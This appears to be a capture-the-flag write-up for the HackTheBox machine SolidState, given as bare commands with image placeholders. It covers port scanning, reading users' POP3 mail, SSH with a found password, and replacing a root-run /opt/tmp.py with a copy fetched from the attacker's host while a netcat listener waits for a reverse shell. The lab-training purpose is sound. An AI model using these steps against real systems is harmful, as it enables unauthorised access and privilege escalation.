echo "10.129.29.189 solidstate.htb" | sudo tee -a /etc/hosts

nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.129.29.189

nmap -p 22,25,80,110,119,4555 -sC -sV -oA scans/nmap-tcpscripts 10.129.29.189

rustscan --accessible -a solidstate.htb -r 1-65535 -- -sT -sV -sC -Pn

Pasted image 20210304212100.png

gobuster dir -u http://10.129.29.189/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x html -o scans/gobuster-root-html-small -t 40

Pasted image 20210304212153.png

nc -v solidstate.htb 4555

Pasted image 20210304212223.png

Pasted image 20210304212233.png

Pasted image 20210304212245.png

POP3 telnet solidstate.htb 110 USER john PASS test LIST

Pasted image 20210304212305.png

#to read email RETR 1

Pasted image 20210304212328.png

telnet solidstate.htb 110 USER mindy PASS test LIST RETR 1

Pasted image 20210304212345.png

RETR 2

Pasted image 20210304212401.png

ssh mindy@10.129.29.189 -t bash P@55W0rd1!2@

Pasted image 20210304212420.png

#you can see mindys shell is rbash cat /etc/passwd

Pasted image 20210304212436.png

searchsploit james searchsploit -m linux/remote/35513.py

Pasted image 20210304212457.png

ls -l /opt/ cat /opt/tmp.py

Pasted image 20210304212513.png

python3 -m http.server 8888

cat tmp.py

Pasted image 20210304212528.png

Pasted image 20210304212534.png

cd /tmp wget http://10.10.14.123:8000/tmp.py cp tmp.py /opt/tmp.py

nc -lvnp 4444

![[Pasted image 20210304212555.png]]

boxes

copyright©2022 Cu3rv0x all rights reserved